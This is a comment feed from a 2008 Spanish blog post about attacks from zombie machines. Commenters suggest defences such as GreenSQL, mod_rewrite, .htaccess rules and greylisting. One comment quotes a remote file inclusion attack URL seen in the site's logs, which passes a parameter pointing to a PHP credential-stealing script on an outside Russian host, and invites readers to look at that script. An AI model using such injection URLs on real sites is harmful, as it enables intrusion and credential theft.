Comentarios en: Una de zombies http://www.bizzit.es/blog/?p=742 Ingeniería del software y aplicaciones web Mon, 16 Aug 2010 16:25:18 +0000 hourly 1 http://wordpress.org/?v=3.0.1 Por: Javier Jofre http://www.bizzit.es/blog/?p=742&cpage=1#comment-8094 Javier Jofre Sat, 13 Sep 2008 09:14:18 +0000 http://www.balearsinnovacio.com/blog/?p=742#comment-8094 Por cierto, para el que le vaya a ser útil a causa de que tenga que trabajar o manejar bases de datos MySQL: <a href="http://sentidoweb.com/2008/09/08/greensql-proxy-que-protege-mysql-de-sql-injections.php" rel="nofollow">GreenSQL</a> es un proxy que protege a MySQL de las técnicas de SQL Injection. Un saludo. Por cierto, para el que le vaya a ser útil a causa de que tenga que trabajar o manejar bases de datos MySQL: GreenSQL es un proxy que protege a MySQL de las técnicas de SQL Injection.

Un saludo.

]]> Por: Javier Jofre http://www.bizzit.es/blog/?p=742&cpage=1#comment-7424 Javier Jofre Thu, 21 Aug 2008 09:00:51 +0000 http://www.balearsinnovacio.com/blog/?p=742#comment-7424 Efectivamente, otra forma que circula por internet es mediante la modificación del archivo .htaccess. Un saludo. Efectivamente, otra forma que circula por internet es mediante la modificación del archivo .htaccess.

Un saludo.

]]> Por: Makj http://www.bizzit.es/blog/?p=742&cpage=1#comment-7400 Makj Wed, 20 Aug 2008 11:45:28 +0000 http://www.balearsinnovacio.com/blog/?p=742#comment-7400 un posible workaround para solucionar parcialmente el problema es usar el mod_rewrite de apache, eso te permitiria evitar direcciones en las que haya URLs incrustadas con parametros... un posible workaround para solucionar parcialmente el problema es usar el mod_rewrite de apache, eso te permitiria evitar direcciones en las que haya URLs incrustadas con parametros…

]]> Por: Carlos A. García http://www.bizzit.es/blog/?p=742&cpage=1#comment-7392 Carlos A. García Wed, 20 Aug 2008 06:26:20 +0000 http://www.balearsinnovacio.com/blog/?p=742#comment-7392 OK. Lo que nos queda es solucionar el tema de los scripts php. Aparecen como visitas normales a nuestro blog, pero pasando como parámetro un fichero que está locaizado en un ordenador zombi. Este fichero es un php que intenta obtener nuestro nombre de usuario, password, etc. La url con la que acceden a nosotros es, por ejemplo: http://www.balearsinnovacio.com/blog/?p=153/apps/apps.php?app=http://warsector.ru/access2006.log Si tienes uriosidad por ver el php que nos intentan inyectar, sigue el hilo y mira: http://warsector.ru/access2006.log Ejem ... esto es una demostración más de que cualquier legislación sobre internet no es más que un patético intento de ponerle puertas al campo. ¿Alguien sabe como comunicarnos con los rusos para reportarles el incidente? Saludos OK. Lo que nos queda es solucionar el tema de los scripts php. Aparecen como visitas normales a nuestro blog, pero pasando como parámetro un fichero que está locaizado en un ordenador zombi. Este fichero es un php que intenta obtener nuestro nombre de usuario, password, etc.
La url con la que acceden a nosotros es, por ejemplo:
http://www.balearsinnovacio.com/blog/?p=153/apps/apps.php?app=http://warsector.ru/access2006.log
Si tienes uriosidad por ver el php que nos intentan inyectar, sigue el hilo y mira: http://warsector.ru/access2006.log
Ejem … esto es una demostración más de que cualquier legislación sobre internet no es más que un patético intento de ponerle puertas al campo. ¿Alguien sabe como comunicarnos con los rusos para reportarles el incidente?
Saludos

]]> Por: Makj http://www.bizzit.es/blog/?p=742&cpage=1#comment-7391 Makj Wed, 20 Aug 2008 06:07:20 +0000 http://www.balearsinnovacio.com/blog/?p=742#comment-7391 contra el SPAM hay una estrategia muy ingeniosa que permite eliminar entre el 90% y el 100% del SPAM entrante en un servidor de correo, eso si, el coste de esta solucion es un retardo en la entrega de los mensajes. la solucion pasa por incluir un filtro de greylisting a la entrada de nuestro servidor, y a continuacion el tipico filtro antispam para los que se puedan "colar" por el primero. yo era muy esceptico respecto de esta solucion cuando la encontre por ahi, pero la verdad es que funciona increiblemente bien, mucho mejor de lo esperado: el primer filtro elimina alrededor del 90% del posible SPAM, quitando mucho trabajo a nuestro filtro, que si esta bien configurado nos eliminara el resto del SPAM. seguramente este sistema tambien tiene sus puntos debiles, pero seguro que son mucho mas fuertes que sin todo esto contra el SPAM hay una estrategia muy ingeniosa que permite eliminar entre el 90% y el 100% del SPAM entrante en un servidor de correo, eso si, el coste de esta solucion es un retardo en la entrega de los mensajes.
la solucion pasa por incluir un filtro de greylisting a la entrada de nuestro servidor, y a continuacion el tipico filtro antispam para los que se puedan “colar” por el primero.
yo era muy esceptico respecto de esta solucion cuando la encontre por ahi, pero la verdad es que funciona increiblemente bien, mucho mejor de lo esperado: el primer filtro elimina alrededor del 90% del posible SPAM, quitando mucho trabajo a nuestro filtro, que si esta bien configurado nos eliminara el resto del SPAM.
seguramente este sistema tambien tiene sus puntos debiles, pero seguro que son mucho mas fuertes que sin todo esto

]]>